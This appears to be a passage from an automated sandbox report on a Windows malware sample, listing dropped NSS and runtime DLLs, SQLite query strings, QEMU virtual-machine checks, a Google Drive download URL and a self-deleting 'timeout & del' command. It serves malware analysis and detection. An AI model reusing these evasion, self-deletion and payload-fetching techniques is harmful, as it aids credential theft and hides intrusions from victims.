Source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, softokn3.dll.12.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, softokn3.dll.12.dr	Binary or memory string: SELECT ALL id FROM %s;
Source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, softokn3.dll.12.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, softokn3.dll.12.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nss3.dll.12.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nss3.dll.12.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nss3.dll.12.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nss3.dll.12.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);
Source: 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nss3.dll.12.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, softokn3.dll.12.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1676:120:WilError_01
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5-F9414907-A57CDE79-FE96701B-9327B159A

Source: C:\Users\user\Desktop\1COK25f1vT.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Yara match	File source: 00000000.00000002.385834969.000000001FC24000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.383092369.0000000002A90000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_00401C74 push 15091DEAh; retf	0_2_00401C79
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_00407496 push edx; ret	0_2_00407497
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_004058B3 push edx; ret	0_2_004058B4
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_00403343 push edi; ret	0_2_00403364
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_00404B0D push di; ret	0_2_00404B18
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_00401DCF push edi; ret	0_2_00401DD8
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_004071D7 push edi; ret	0_2_004071D8
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_004061F5 push esi; ret	0_2_004061FD
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_00406B98 push cs; retf	0_2_00406C33
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A92AFC pushad ; retn 0004h	0_2_02A92E3B
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A932F4 push esi; iretd	0_2_02A9334A
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A938DA push eax; iretd	0_2_02A93AB2
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 0_2_02A93407 push 29C13045h; iretd	0_2_02A9340D
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_0041A068 push 0041A08Eh; ret	12_2_0041A086
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_0041A02C push 0041A05Ch; ret	12_2_0041A054
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_0040E8D0 push 0040E905h; ret	12_2_0040E8FD
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_0040B164 push 0040B190h; ret	12_2_0040B188
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_0040E908 push 0040E94Ah; ret	12_2_0040E942
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_0040B12C push 0040B158h; ret	12_2_0040B150
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_0040C136 push 0040C164h; ret	12_2_0040C15C
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_0040C138 push 0040C164h; ret	12_2_0040C15C
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_0040813C push 00408174h; ret	12_2_0040816C
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_004171E8 push 00417214h; ret	12_2_0041720C
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_0040C9EA push 0040CA18h; ret	12_2_0040CA10
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_0040C9EC push 0040CA18h; ret	12_2_0040CA10
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_0040E1A4 push 0040E1D0h; ret	12_2_0040E1C8
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_0040B1B8 push 0040B1E4h; ret	12_2_0040B1DC
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_0040E25A push 0040E288h; ret	12_2_0040E280
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_0040E25C push 0040E288h; ret	12_2_0040E280
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_00414A18 push 00414A84h; ret	12_2_00414A7C
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Code function: 12_2_00414A28 push 00414A84h; ret	12_2_00414A7C

Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file

Source: C:\Users\user\Desktop\1COK25f1vT.exe	Process created: C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "1COK25f1vT.exe
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Process created: C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "1COK25f1vT.exe			Jump to behavior

Source: C:\Users\user\Desktop\1COK25f1vT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\1COK25f1vT.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Source: 1COK25f1vT.exe, 0000000C.00000002.511282880.0000000002150000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=17RU0VECH2DONYHAGWGUE-YWT9AUTZSM-
Source: 1COK25f1vT.exe, 0000000C.00000002.511282880.0000000002150000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\1COK25f1vT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
